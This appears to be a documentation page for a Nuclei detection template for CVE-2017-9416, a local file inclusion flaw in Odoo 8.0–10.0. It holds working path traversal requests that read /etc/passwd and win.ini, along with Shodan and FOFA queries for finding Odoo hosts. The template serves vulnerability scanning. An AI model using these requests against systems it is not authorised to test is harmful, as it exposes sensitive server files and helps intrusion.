Skip to content
Nuclei Templates

Odoo 8.0/9.0/10.0 - Local File Inclusion

ID: CVE-2017-9416

Severity: medium

Author: Co5mos

Tags: cve2017,cve,odoo,lfi

Description

Section titled “Description”

Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

YAML Source

Section titled “YAML Source”
id: CVE-2017-9416


info:
  name: Odoo 8.0/9.0/10.0 - Local File Inclusion
  author: Co5mos
  severity: medium
  description: |
    Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Allows an attacker to read arbitrary files on the server.
  remediation: |
    Upgrade to a patched version of Odoo or apply the necessary security patches.
  reference:
    - https://github.com/odoo/odoo/issues/17394
    - https://nvd.nist.gov/vuln/detail/CVE-2017-9416
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2017-9416
    cwe-id: CWE-22
    epss-score: 0.01187
    epss-percentile: 0.85048
    cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: odoo
    product: odoo
    shodan-query:
      - cpe:"cpe:2.3:a:odoo:odoo"
      - http.title:"odoo"
    fofa-query: title="odoo"
    google-query: intitle:"odoo"
  tags: cve2017,cve,odoo,lfi


http:
  - method: GET
    path:
      - "{{BaseURL}}/base_import/static/c:/windows/win.ini"
      - "{{BaseURL}}/base_import/static/etc/passwd"


    stop-at-first-match: true


    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
        condition: and


      - type: dsl
        dsl:
          - "contains(body, 'bit app support')"
          - "contains(body, 'fonts')"
          - "contains(body, 'extensions')"
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502206b0c6c890e1fda26a4764d37939ef9e14a7d160188822ceaeee75208c0b1d9c002210085185ae60a735e9a87324ce5a07210ab58d908864539db4e3e3b031b7b396d57:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-9416.yaml"

View on Github